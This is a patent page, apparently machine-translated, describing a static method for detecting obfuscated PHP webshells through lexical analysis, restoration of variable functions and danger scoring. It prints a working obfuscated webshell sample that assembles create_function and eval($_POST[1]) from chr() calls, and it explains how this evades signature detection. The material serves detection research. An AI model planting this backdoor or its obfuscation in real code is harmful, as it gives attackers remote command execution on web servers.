
CN107341399A - Method and device for assessing code file security - Google Patents

Method and device for assessing code file security

Info

Publication number
CN107341399A
Authority
CN
China
Prior art keywords
token
function
variable
code file
expression
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Granted
Application number
CN201610282740.8A
Other languages
Chinese (zh)
Other versions
CN107341399B (en
Inventor
吴阳波
朱东海
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Alibaba Group Holding Ltd
Original Assignee
Alibaba Group Holding Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Alibaba Group Holding Ltd filed Critical Alibaba Group Holding Ltd
Priority to CN201610282740.8A priority Critical patent/CN107341399B/en
Publication of CN107341399A publication Critical patent/CN107341399A/en
Application granted granted Critical
Publication of CN107341399B publication Critical patent/CN107341399B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Classifications

    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55 Detecting local intrusion or implementing counter-measures
    • G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562 Static detection
    • G06F21/563 Static detection by source code analysis

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Software Systems (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Virology (AREA)
  • Health & Medical Sciences (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • General Health & Medical Sciences (AREA)
  • Machine Translation (AREA)
  • Information Retrieval, Db Structures And Fs Structures Therefor (AREA)

Abstract

The invention discloses a method and device for assessing code file security. The method includes: parsing variable functions and assignment expressions from a code file to be detected; restoring the directly invoked function and the original call function according to the variable functions and assignment expressions; and assessing the security of the code file using a preset safety coefficient corresponding to the directly invoked function and a preset safety coefficient corresponding to the original call function. The invention solves the technical problem that the security detection schemes for webshell code files provided in the related art have low detection efficiency and low accuracy.

Description

Method and device for assessing code file security
Technical field
The present invention relates to the field of computer software, and in particular to a method and device for assessing code file security.
Background
"Web" means that a server offers web services, and "shell" means obtaining a certain degree of operating privilege on the server. A webshell is a command execution environment that usually exists in the form of a web page file such as asp, php, jsp or cgi, and can also be called a web backdoor. After compromising a website, an attacker typically mixes an asp or php backdoor file in with the normal web page files under the web directory of the website server, and can then access the asp or php backdoor with a browser in order to control the website server.
Webshells mostly appear as dynamic scripts and are essentially just another page of the website. However, their functionality goes far beyond what a single page is permitted to do: they can perform one or more operations at the system level, operations that normally only the webmaster has permission to perform. For this reason they are also commonly called website backdoor tools.
In computer science, lexical analysis is the process of converting a character string into a sequence of words (Tokens, the smallest elements of a programming language). Lexical analysis is the first phase of compilation and the foundation of compiling. The task of this phase is to read the source program character by character from left to right, that is, to scan the character stream that makes up the source program, and then identify words (also called word symbols or symbols) according to word-formation rules. The core tasks of lexical parsing are to scan and identify words, and to classify each identified word and give it a fixed-length representation.
PHP supports the concept of variable functions. This means that if a variable name is followed by round parentheses, PHP looks for a function whose name is the value of the variable and attempts to execute it. Variable functions cannot be used with language constructs such as echo(), print(), unset(), isset(), empty(), include(), require() and similar statements; to use these constructs as variable functions, they must be wrapped in a function of one's own.
In recent years, with the rapid development of Internet technology, attacks by hackers on websites have kept increasing. According to the 2014 China Internet Network Security Report issued by the National Internet Emergency Response Center, backdoors were implanted in 40,186 websites within China during 2014, including 1,529 government websites. After successfully exploiting a web vulnerability, attackers often upload a webshell to a hidden directory of the website to obtain persistent control over it. Most webshell connections resemble normal website visits: data is transferred through a browser over port 80 using HTTP, which makes them highly covert and leaves no record in traditional firewalls. In addition, according to statistics from the w3techs website, as of January 24, 2016 PHP accounted for 81.7% of the programming languages used by websites worldwide, so the share of webshells written for PHP websites has also increased significantly.
Because a webshell must be interpreted and executed by the corresponding script interpreter, lexical parsing is performed before execution: the code is broken into individual words (tokens), and each word is assigned a specific role. These words are the most basic building blocks of a programming language, that is, Tokens.
At present, the related art provides a virtual-machine-based dynamic detection technique for PHP webshells. The code file is first lexically and syntactically parsed to produce intermediate-layer code. The intermediate code obtained in the previous step is then interpreted and executed on a virtual machine, and during execution a built-in function library and a rule base of abnormal behavior are used to analyze the intermediate behavior and thereby judge whether the code is a malicious webshell.
However, because this dynamic webshell detection technique requires simulated execution on a virtual machine, detection takes a long time; it can neither truly understand the semantics nor detect in real time. Moreover, most current webshells require a password and run parameters. If the parameters or password are not supplied, virtual-machine dynamic detection cannot judge whether the code is malicious at all. This is a gap that current virtual machine detection technology finds hard to cross.
In addition, existing static webshell detection techniques usually rely on signature matching to judge whether a script file is a malicious webshell. This approach performs strict string matching between the scripts on the website and the signatures in a signature database; if a signature string is found in a script, the script is judged to be a malicious webshell. Signatures can similarly be described with regular expressions, but in essence the approach still depends on signatures. Current static webshell detection therefore has the following defects: the accuracy of judging whether a file is a malicious webshell is low and the false positive rate is high; the signature database is huge and requires staff to keep collecting samples and extracting signatures; and, especially for obfuscated PHP variable functions, a detector that relies on the signature database alone is largely unable to detect malicious webshells.
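The limitation of signature matching described above can be illustrated with a minimal Python sketch. The two signatures and both sample strings are hypothetical and chosen only for illustration; they are not taken from any real signature database.

```python
import re

# Hypothetical signatures; a real database would hold many more.
SIGNATURES = [re.compile(r"eval\s*\("), re.compile(r"create_function\s*\(")]

def signature_match(source):
    """Return True if any signature occurs literally in the source text."""
    return any(signature.search(source) for signature in SIGNATURES)

# A plain webshell contains the dangerous call as literal text.
plain = "<?php eval($_POST[1]); ?>"

# An obfuscated one builds the function name from chr() calls,
# so the literal text "eval(" never appears in the file.
obfuscated = "<?php $_uU=chr(99).chr(104).chr(114); $_cC=$_uU(101).$_uU(118); ?>"

print(signature_match(plain))       # the plain sample is flagged
print(signature_match(obfuscated))  # the obfuscated sample is missed
```

The second sample is missed because the matcher only sees the text as written, not the strings the script would assemble at run time.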
No effective solution to the above problems has yet been proposed.
Summary of the invention
Embodiments of the invention provide a method and device for assessing code file security, to at least solve the technical problem that the security detection schemes for webshell code files provided in the related art have low detection efficiency and low accuracy.
According to one aspect of the embodiments of the invention, a method for assessing code file security is provided, including:
parsing variable functions and assignment expressions from a code file to be detected; restoring the directly invoked function and the original call function according to the variable functions and assignment expressions; and assessing the security of the code file using a preset safety coefficient corresponding to the directly invoked function and a preset safety coefficient corresponding to the original call function.
Optionally, parsing the variable functions and assignment expressions from the code file includes: performing lexical analysis on the code file to convert the character strings in the code file into a Token sequence; and parsing the variable functions and assignment expressions from the Token sequence.
Optionally, parsing the variable functions from the Token sequence includes: a search step: traversing each Token in the Token sequence in a preset order and searching for a first Token whose category is operator and whose value is a left round parenthesis; a judgment step: when the first Token is found, judging whether the category of the previously traversed Token adjacent to the first Token is variable; if so, searching, starting from the first Token, for a second Token whose category is operator and whose value is a right round parenthesis, and, when the parameter set between the first Token and the second Token matches a preset regular expression, recording the currently found function as a variable function and returning to the search step, until all variable functions have been parsed.
Optionally, parsing the assignment expressions from the Token sequence includes: a search step: traversing each Token in the Token sequence in a preset order and searching for a third Token whose category is operator and whose value is an equal sign; an obtaining step: when the third Token is found, obtaining the previously traversed Token adjacent to the third Token and recording its value as the variable to be assigned in the currently found assignment expression; searching, starting from the third Token, for a fourth Token whose category is operator and whose value is a semicolon, obtaining the one or more Tokens between the third Token and the fourth Token, recording them as the expression to be evaluated in the currently found assignment expression, and returning to the search step, until all assignment expressions have been parsed.
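The search and obtaining steps for assignment expressions can be sketched in Python as follows. This is only an illustration under stated assumptions: Tokens are modeled as (category, value) pairs, and the function name find_assignments and the lowercase category names are hypothetical.

```python
def find_assignments(tokens):
    """Return (target_variable, expression_tokens) for each `variable = ... ;`."""
    assignments = []
    i = 0
    while i < len(tokens):
        # Third Token: an operator whose value is the equal sign.
        if tokens[i] == ("operator", "=") and i > 0:
            # The previously traversed Token holds the variable to be assigned.
            target = tokens[i - 1][1]
            # Fourth Token: the next operator whose value is a semicolon.
            j = i + 1
            while j < len(tokens) and tokens[j] != ("operator", ";"):
                j += 1
            # Everything in between is the expression to be evaluated.
            assignments.append((target, tokens[i + 1:j]))
            i = j
        i += 1
    return assignments

tokens = [
    ("variable", "$_uU"), ("operator", "="),
    ("identifier", "chr"), ("operator", "("), ("number", "99"), ("operator", ")"),
    ("operator", "."),
    ("identifier", "chr"), ("operator", "("), ("number", "104"), ("operator", ")"),
    ("operator", ";"),
]
assignments = find_assignments(tokens)
target, expression = assignments[0]
print(target, "".join(value for _, value in expression))
```

The sketch treats every equal sign as an assignment; a fuller version would need to tell `=` apart from comparison operators during lexical analysis.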
Optionally, restoring the directly invoked function and the original call function according to the variable functions and assignment expressions includes: looking up, in preset transcoding rules, the directly invoked function that matches the variable function; computing the value corresponding to the variable of each assignment expression, and establishing a correspondence between the variable of each assignment expression and its value; and identifying the original call function from the directly invoked function using the preset transcoding rules and the correspondence.
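As a rough Python sketch of this restoring step, the code below keeps a table that maps each assigned variable to its computed value and uses that table to backtrack through calls made via a variable. It assumes the only transcoding rule is ASCII decoding through chr, and it works on statement strings rather than Tokens for brevity; the function name restore and the regular expression are hypothetical.

```python
import re

# Matches calls such as chr(99) or $_uU(99): a callee followed by one number.
CALL = re.compile(r"(\$?\w+)\((\d+)\)")

def restore(statements):
    """Map each assigned variable to the string its expression evaluates to."""
    values = {}
    for statement in statements:
        target, expression = statement.rstrip(";").split("=", 1)
        decoded = []
        for callee, code in CALL.findall(expression):
            # Backtrack: a callee such as $_uU is replaced by its recorded value.
            name = values.get(callee, callee)
            if name != "chr":
                raise ValueError(f"unsupported callee {callee!r}")
            decoded.append(chr(int(code)))
        values[target] = "".join(decoded)
    return values

values = restore([
    "$_uU=chr(99).chr(104).chr(114);",
    "$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95)"
    ".$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);",
])
print(values)
```

Here $_uU resolves to chr, and $_fF can only be resolved after looking $_uU up in the table, which is the backtracking the paragraph describes.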
Optionally, assessing the security of the code file using the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function includes: reading, from a preset storage area, the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function; and summing the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function to obtain the security assessment result.
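The summation can be sketched in Python as below. The coefficient values, the threshold and the function name assess are all assumptions made for illustration; the source only states that the coefficients are preset and that they are summed.

```python
# Hypothetical preset coefficients (higher means more dangerous).
SAFETY_COEFFICIENTS = {"chr": 1, "create_function": 8, "eval": 10}

def assess(direct_functions, original_functions, threshold=10):
    """Sum the coefficients of all restored functions and compare to a threshold.

    The threshold is an assumption; the source only describes the summation.
    """
    score = sum(SAFETY_COEFFICIENTS.get(name, 0) for name in direct_functions)
    score += sum(SAFETY_COEFFICIENTS.get(name, 0) for name in original_functions)
    return score, score >= threshold

score, suspicious = assess(["chr"], ["create_function", "eval"])
print(score, suspicious)
```

Functions that have no entry in the table contribute zero here, which is one possible design choice among several.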
According to another aspect of the embodiments of the invention, another method for assessing code file security is provided, including:
parsing variable functions from a code file to be detected; restoring the directly invoked function according to the variable functions; and assessing the security of the code file using a preset safety coefficient corresponding to the directly invoked function.
According to another aspect of the embodiments of the invention, a device for assessing code file security is provided, including:
a parsing module, configured to parse variable functions and assignment expressions from a code file to be detected; a restoring module, configured to restore the directly invoked function and the original call function according to the variable functions and assignment expressions; and an evaluation module, configured to assess the security of the code file using a preset safety coefficient corresponding to the directly invoked function and a preset safety coefficient corresponding to the original call function.
Optionally, the parsing module includes: a converting unit, configured to perform lexical analysis on the code file and convert the character strings in the code file into a Token sequence; and a parsing unit, configured to parse the variable functions and assignment expressions from the Token sequence.
Optionally, the parsing unit includes: a first search subunit, configured to traverse each Token in the Token sequence in a preset order and search for a first Token whose category is operator and whose value is a left round parenthesis; a judgment subunit, configured to judge, when the first Token is found, whether the category of the previously traversed Token adjacent to the first Token is variable; and a first parsing subunit, configured to, when the output of the judgment subunit is yes, search, starting from the first Token, for a second Token whose category is operator and whose value is a right round parenthesis, and, when the parameter set between the first Token and the second Token matches a preset regular expression, record the currently found function as a variable function and return to the first search subunit, until all variable functions have been parsed.
Optionally, the parsing unit includes: a second search subunit, configured to traverse each Token in the Token sequence in a preset order and search for a third Token whose category is operator and whose value is an equal sign; an obtaining subunit, configured to, when the third Token is found, obtain the previously traversed Token adjacent to the third Token and record its value as the variable to be assigned in the currently found assignment expression; and a second parsing subunit, configured to search, starting from the third Token, for a fourth Token whose category is operator and whose value is a semicolon, obtain the one or more Tokens between the third Token and the fourth Token, record them as the expression to be evaluated in the currently found assignment expression, and return to the second search subunit, until all assignment expressions have been parsed.
Optionally, the restoring module includes: a first restoring unit, configured to look up, in preset transcoding rules, the directly invoked function that matches the variable function; a processing unit, configured to compute the value corresponding to the variable of each assignment expression and establish a correspondence between the variable of each assignment expression and its value; and a second restoring unit, configured to identify the original call function from the directly invoked function using the preset transcoding rules and the correspondence.
Optionally, the evaluation module includes: a reading unit, configured to read, from a preset storage area, the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function; and a computing unit, configured to sum the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function to obtain the security assessment result.
According to yet another aspect of the embodiments of the invention, another device for assessing code file security is provided, including:
a parsing module, configured to parse variable functions from a code file to be detected; a restoring module, configured to restore the directly invoked function according to the variable functions; and an evaluation module, configured to assess the security of the code file using a preset safety coefficient corresponding to the directly invoked function.
In the embodiments of the invention, variable functions and assignment expressions are parsed from the code file to be detected, the directly invoked function and the original call function are restored according to the variable functions and assignment expressions, and the security of the code file is assessed using the preset safety coefficient corresponding to the directly invoked function and the preset safety coefficient corresponding to the original call function. This improves the detection efficiency for variable-function webshell code files and the accuracy of the detection result, and thereby solves the technical problem that the security detection schemes for webshell code files provided in the related art have low detection efficiency and low accuracy.
Brief description of the drawings
The accompanying drawings described here provide a further understanding of the invention and form part of this application. The illustrative embodiments of the invention and their description are used to explain the invention and do not unduly limit it. In the drawings:
Fig. 1 is a block diagram of the hardware structure of a computer terminal for a method for assessing code file security according to an embodiment of the invention;
Fig. 2 is a flowchart of a method for assessing code file security according to an embodiment of the invention;
Fig. 3 is a flowchart of another method for assessing code file security according to an embodiment of the invention;
Fig. 4 is a structural block diagram of a device for assessing code file security according to an embodiment of the invention;
Fig. 5 is a structural block diagram of a device for assessing code file security according to a preferred embodiment of the invention;
Fig. 6 is a structural block diagram of another device for assessing code file security according to an embodiment of the invention;
Fig. 7 is a structural block diagram of a computer terminal according to an embodiment of the invention.
Detailed description
To help those skilled in the art better understand the solution of the invention, the technical solutions in the embodiments of the invention are described clearly and completely below with reference to the accompanying drawings. The described embodiments are only some of the embodiments of the invention, not all of them. All other embodiments obtained by a person of ordinary skill in the art based on the embodiments of the invention without creative effort shall fall within the scope of protection of the invention.
It should be noted that the terms "first", "second" and so on in the description, the claims and the above drawings are used to distinguish similar objects and do not describe a specific order or sequence. Data used in this way can be interchanged where appropriate, so that the embodiments of the invention described here can be implemented in orders other than those illustrated or described. In addition, the terms "include" and "have" and any variants of them are intended to cover non-exclusive inclusion. For example, a process, method, system, product or device that contains a series of steps or units is not necessarily limited to the steps or units explicitly listed, and may include other steps or units that are not explicitly listed or that are inherent to the process, method, product or device.
The terms used in the invention are explained as follows:
(1) A variable function is a function concept supported by PHP: if a variable name is followed by round parentheses, PHP looks for a function whose name is the value of the variable and attempts to execute the function it finds;
(2) An assignment expression connects a variable to an expression with an equal sign. The value of the expression on the right of the assignment operator is computed and assigned to the variable on the left, and the value of the variable on the left is taken as the value of the assignment expression;
(3) A directly invoked function is the un-transcoded function restored by direct invocation, according to preset transcoding rules, from a variable function parsed from the code file;
For example, from "$_uU=chr(99).chr(104).chr(114)" the directly invoked function chr can be restored according to the ASCII transcoding rule;
(4) An original call function is the un-transcoded function restored by backtracking (iterative) invocation, according to preset transcoding rules, from the variable functions and assignment expressions parsed from the code file;
For example, from "$_uU=chr(99).chr(104).chr(114)" the directly invoked function chr can be restored according to the ASCII transcoding rule;
from "$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110)" the directly invoked function create_function can be restored according to the ASCII transcoding rule;
from "$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59)" the directly invoked function eval($_POST[1]); can be restored according to the ASCII transcoding rule;
the original call function finally obtained for $_=$_fF("",$_cC) is: create_function("", "eval($_POST[1]);").
(5) A transcoding rule is a pre-established standard for converting code from one form to another;
(6) A safety coefficient is the security level of a commonly used function, or the danger level of a dangerous function, obtained from long-term statistical analysis;
(7) Assessment means judging whether the code file is a webshell file maliciously uploaded by an intruder (or attacker).
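The ASCII transcoding in examples (3) and (4) can be checked with a few lines of Python. The helper name decode is hypothetical; the code lists are copied from the examples above.

```python
def decode(codes):
    """Concatenate the characters for a list of ASCII codes."""
    return "".join(chr(code) for code in codes)

u_u = decode([99, 104, 114])
f_f = decode([99, 114, 101, 97, 116, 101, 95, 102, 117, 110, 99, 116, 105, 111, 110])
c_c = decode([101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 49, 93, 41, 59])

print(u_u)
print(f_f)
print(c_c)
```

The three results are the strings named in the examples: the function name chr, the function name create_function, and the code fragment eval($_POST[1]);.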
Embodiment 1
According to an embodiment of the invention, a method embodiment for assessing code file security is provided. It should be noted that the steps shown in the flowcharts of the drawings can be executed in a computer system, for example as a set of computer-executable instructions, and that although a logical order is shown in the flowcharts, in some cases the steps shown or described can be executed in a different order.
The method embodiment provided in Embodiment 1 of this application can be executed on a mobile terminal, a computer terminal or a similar computing device. Taking execution on a computer terminal as an example, Fig. 1 is a block diagram of the hardware structure of a computer terminal for a method for assessing code file security according to an embodiment of the invention. As shown in Fig. 1, the computer terminal 10 can include one or more processors 102 (only one is shown in the figure; the processor 102 can include, but is not limited to, a processing device such as a microprocessor MCU or a programmable logic device FPGA), a memory 104 for storing data, and a transmission device 106 for communication functions. A person of ordinary skill in the art will understand that the structure shown in Fig. 1 is only illustrative and does not limit the structure of the above electronic device. For example, the computer terminal 10 may include more or fewer components than shown in Fig. 1, or have a configuration different from that shown in Fig. 1.
The memory 104 can be used to store the software programs and modules of application software, such as the program instructions/modules corresponding to the method for assessing code file security in the embodiments of the invention. By running the software programs and modules stored in the memory 104, the processor 102 executes various functional applications and data processing, that is, implements the above method for assessing code file security. The memory 104 may include high-speed random access memory and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory or other non-volatile solid-state memory. In some examples, the memory 104 may further include memory located remotely from the processor 102, and such remote memory can be connected to the computer terminal 10 through a network. Examples of such networks include, but are not limited to, the Internet, intranets, local area networks, mobile communication networks and combinations of these.
The transmission device 106 is used to receive or send data via a network. A specific example of such a network is a wireless network provided by the communication provider of the computer terminal 10. In one example, the transmission device 106 includes a network adapter (Network Interface Controller, NIC), which can connect to other network devices through a base station and thereby communicate with the Internet. In another example, the transmission device 106 can be a radio frequency (RF) module, which communicates with the Internet wirelessly.
In the above operating environment, this application provides the method for assessing code file security shown in Fig. 2. Fig. 2 is a flowchart of a method for assessing code file security according to an embodiment of the invention. As shown in Fig. 2, the method can include the following processing steps:
Step S22: parse variable functions and assignment expressions from the code file to be detected;
Step S24: restore the directly invoked function and the original call function according to the variable functions and assignment expressions;
Step S26: assess the security of the code file using a preset safety coefficient corresponding to the directly invoked function and a preset safety coefficient corresponding to the original call function.
The technical solution provided by the embodiments of the invention can be applied to static webshell detection for PHP scripts. A code file written in PHP is parsed (including lexical analysis and semantic analysis), and variable functions assembled by string concatenation are restored. Code backtracking is then carried forward based on the restored directly invoked function and the assignment expressions in the code file until the original call function is restored, in order to judge whether the code file contains functions commonly used by webshells or dangerous functions. The security of the code file is then assessed using the preset safety coefficient corresponding to the directly invoked function (for example, the danger level of a commonly used function or dangerous function) and the preset safety coefficient corresponding to the original call function, to judge whether the code file is a webshell file maliciously uploaded by an intruder (or attacker).
It should be noted that the above security assessment process can be implemented in Lua. Lua has a small footprint, runs fast, uses little memory, is highly compatible and is quick to develop with, and Lua and C/C++ can call each other easily, so the technical solution provided by the embodiments of the invention is easy to integrate.
Optionally, in step S22, parsing the variable functions and assignment expressions from the code file can include the following steps:
Step S221: perform lexical analysis on the code file and convert the character strings in the code file into a Token sequence;
Step S222: parse the variable functions and assignment expressions from the Token sequence.
The lexical analyzer can draw on Lua's lexer library and the lexical analysis of PHP's zend module to extract identifiers, comments, numbers, PHP keywords, variables, operators and special characters from the source program in the code file by regular-expression matching, and then extract all Tokens from the original code file in order of appearance to form a Tokens array. The word symbols output by the lexical analyzer can generally be expressed as the following pair: (word category, word attribute value);
Because keywords are identifiers with a fixed meaning defined by the programming language, they are generally not used as ordinary identifiers. Identifiers can represent various names, such as variable names, array names, function names and procedure names. Constant types can include, but are not limited to, integer, real, Boolean and character. Operator types can include, but are not limited to, +, -, * and /.
Suppose the following code segment is taken from the code file to be detected:
<?php
$_uU=chr(99).chr(104).chr(114);
$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);
$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);
$_=$_fF("",$_cC);
@$_();
?>
Taking the code line "$_uU=chr(99).chr(104).chr(114);" as an example, the result of lexical analysis is shown in Table 1:
Table 1
Category      Attribute value
Variable      $_uU
Operator      =
Identifier    chr
Operator      (
Number        99
Operator      )
Operator      .
Identifier    chr
Operator      (
Number        104
Operator      )
Operator      .
Identifier    chr
Operator      (
Number        114
Operator      )
Operator      ;
The character strings of the above code segment can be converted into a Token sequence in the manner shown in Table 1, and the variable functions and assignment expressions are then parsed from the Token sequence.
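The conversion into (category, attribute value) pairs can be illustrated with a minimal sketch. It is written in Python rather than Lua purely for illustration, and the category patterns in `TOKEN_SPEC` and the function name `tokenize` are assumptions made for this example; they are not the lexer of the embodiment, which also handles comments and keywords.

```python
import re

# Hypothetical category patterns, tried in this order (assumed for illustration).
TOKEN_SPEC = [
    ("Variable",   r"\$[A-Za-z_][A-Za-z0-9_]*"),
    ("Number",     r"\d+"),
    ("String",     r'"[^"]*"|' + r"'[^']*'"),
    ("Identifier", r"[A-Za-z_][A-Za-z0-9_]*"),
    ("Operator",   r"[=().;,@\[\]+\-*/]"),
]
MASTER = re.compile("|".join(f"(?P<{name}>{pat})" for name, pat in TOKEN_SPEC))


def tokenize(source):
    """Return the Tokens array as a list of (category, attribute value) pairs."""
    tokens = []
    pos = 0
    while pos < len(source):
        if source[pos].isspace():          # whitespace carries no Token
            pos += 1
            continue
        match = MASTER.match(source, pos)
        if match is None:
            raise ValueError(f"unrecognised character at offset {pos}")
        # lastgroup is the name of the category pattern that matched
        tokens.append((match.lastgroup, match.group()))
        pos = match.end()
    return tokens


if __name__ == "__main__":
    for category, value in tokenize("$_uU=chr(99).chr(104).chr(114);"):
        print(category, value)
```

Run on the code line used for Table 1, the sketch yields one pair per table row, in the same order.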
Optionally, in step S222, parsing the variable functions from the Token sequence may include the following steps:
Step S2221: Traverse each Token in the Token sequence in a preset order, and look for a first Token whose category is operator and whose value is a left parenthesis;
Step S2222: When the first Token is found, determine whether the category of the previously traversed Token adjacent to the first Token is variable;
Step S2223: If so, search onward from the first Token for a second Token whose category is operator and whose value is a right parenthesis; if the parameter set between the first Token and the second Token matches a preset regular expression, record the function currently found as a variable function, and return to step S2221 until all variable functions have been parsed.
After the Tokens array has been obtained by lexical analysis, each Token in the Tokens array can be traversed in a preset order (for example, the order in which the lexical analyzer analyzed the code file). Because a function call requires parentheses (i.e., "()"), the first step is to look for a Tokens[i] whose category is operator and whose value is a left parenthesis (i.e., "("), which corresponds to the first Token above. Second, once such a Tokens[i] has been found, it is determined whether the category of the previously traversed Tokens[i-1] is variable. Then, if the category of Tokens[i-1] is variable, the search continues for a Tokens[i+n] whose category is operator and whose value is a right parenthesis (corresponding to the second Token above, where n is a positive integer). If the parameter set between the first Token and the second Token matches the preset regular expression, the function currently found is recorded as a variable function. The parameter set only needs to satisfy the matching rule of the PHP regular expression. For example, the parameter set may include, but is not limited to, at least one of the following: letters, digits, underscores, special characters (for example, $), and parameters passed when a user accesses the PHP web page.
It should be noted that if $ appears together with at least one of letters, digits, and underscores, the parameter must begin with $, for example $_POST['aaa']. A parameter that does not begin with $, such as a$b, does not satisfy the matching rule of the PHP regular expression.
In the above code segment, when the first "(" is detected, the Token preceding it is chr, whose category is identifier rather than variable, so chr(99) is not a variable function. When the second "(" is detected, the preceding Token is again chr, whose category is identifier rather than variable, so chr(104) is not a variable function. The same holds for the third "(", so chr(114) is not a variable function either. When the fourth "(" is detected, the preceding Token is $_uU, whose category is variable, so it must further be determined whether the 101 between this "(" and the first ")" after it satisfies the matching rule of the PHP regular expression. The number 101 does satisfy the rule, so $_uU(101) is a variable function of the kind being sought, where $_uU is the variable function name and 101 is its parameter. By analogy, the variable functions in the above code segment also include: $_uU(118), $_uU(97), $_uU(108), $_uU(40), $_uU(36), $_uU(95), $_uU(80), $_uU(79), $_uU(83), $_uU(84), $_uU(91), $_uU(49), $_uU(93), $_uU(41), $_uU(59), $_uU(99), $_uU(114), $_uU(101), $_uU(97), $_uU(116), $_uU(101), $_uU(95), $_uU(102), $_uU(117), $_uU(110), $_uU(99), $_uU(116), $_uU(105), $_uU(111), $_uU(110), and $_fF("", $_cC).
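Steps S2221 to S2223 can be sketched as follows, in Python for illustration. The Tokens array is assumed to be a list of (category, value) tuples. The source does not give the preset regular expression, so `PARAMS` below is a hypothetical pattern that merely reflects the stated rule that a parameter containing $ must begin with $; `find_variable_functions` is likewise an illustrative name.

```python
import re

# Hypothetical pattern for one argument: a $-prefixed variable (optionally
# indexed), a bare word or number, or a quoted string. Assumed for illustration.
ARG = r"""(?:\$\w+(?:\[[^\]]*\])?|\w+|"[^"]*"|'[^']*')"""
PARAMS = re.compile(rf"^(?:{ARG}(?:,{ARG})*)?$")


def find_variable_functions(tokens):
    """Return (variable name, parameter text) for each call made through a variable."""
    found = []
    for i, token in enumerate(tokens):
        # S2221: look for an operator Token whose value is "("
        if token != ("Operator", "(") or i == 0:
            continue
        # S2222: the Token traversed just before it must be a variable
        prev_category, prev_value = tokens[i - 1]
        if prev_category != "Variable":
            continue
        # S2223: locate the first ")" after the "("
        j = i + 1
        while j < len(tokens) and tokens[j] != ("Operator", ")"):
            j += 1
        if j == len(tokens):
            continue                      # unbalanced call, nothing to record
        params = "".join(value for _, value in tokens[i + 1:j])
        if PARAMS.match(params):
            found.append((prev_value, params))
    return found


if __name__ == "__main__":
    sample = [
        ("Variable", "$_uU"), ("Operator", "="), ("Identifier", "chr"),
        ("Operator", "("), ("Number", "99"), ("Operator", ")"), ("Operator", ";"),
        ("Variable", "$_cC"), ("Operator", "="), ("Variable", "$_uU"),
        ("Operator", "("), ("Number", "101"), ("Operator", ")"), ("Operator", ";"),
    ]
    print(find_variable_functions(sample))
```

In the sample, chr(99) is skipped because the Token before its "(" is an identifier, while $_uU(101) is recorded because that Token is a variable.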
Optionally, in step S222, parsing the assignment expressions from the Token sequence may include the following steps:
Step S2224: Traverse each Token in the Token sequence in a preset order, and look for a third Token whose category is operator and whose value is an equals sign;
Step S2225: When the third Token is found, obtain the previously traversed Token adjacent to the third Token, and record the value of the obtained Token as the variable to be assigned in the assignment expression currently found;
Step S2226: Search onward from the third Token for a fourth Token whose category is operator and whose value is a semicolon, obtain the one or more Tokens between the third Token and the fourth Token, record them as the expression to be evaluated in the assignment expression currently found, and return to step S2224 until all assignment expressions have been parsed.
After the Tokens array has been obtained by lexical analysis, parsing assignment expressions differs from parsing variable functions in that an assignment expression is identified mainly by the equals sign (=). Each Token in the Tokens array can again be traversed in a preset order (for example, the order in which the lexical analyzer analyzed the code file). Because an assignment expression requires an equals sign (i.e., "="), the first step is to look for a Tokens[i] whose category is operator and whose value is an equals sign, which corresponds to the third Token above. Second, the previously traversed Tokens[i-1] is obtained, and its value is recorded as the variable to be assigned in the assignment expression currently found. Then, the search continues for a Tokens[i+n] whose category is operator and whose value is a semicolon (corresponding to the fourth Token above, where n is a positive integer), and the one or more Tokens between Tokens[i] and Tokens[i+n] are recorded as the expression to be evaluated in the assignment expression currently found.
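Steps S2224 to S2226 can be sketched in the same style, again in Python for illustration. The Tokens array is assumed to be a list of (category, value) tuples, and `find_assignments` is an illustrative name. Treating a missing semicolon as "expression runs to the end of the array" is a choice made for this sketch, not something stated in the source.

```python
def find_assignments(tokens):
    """Return (variable to be assigned, expression text) for each '=' found."""
    assignments = []
    i = 0
    while i < len(tokens):
        # S2224: look for an operator Token whose value is "="
        if tokens[i] == ("Operator", "=") and i > 0:
            # S2225: the Token traversed just before "=" names the target
            target = tokens[i - 1][1]
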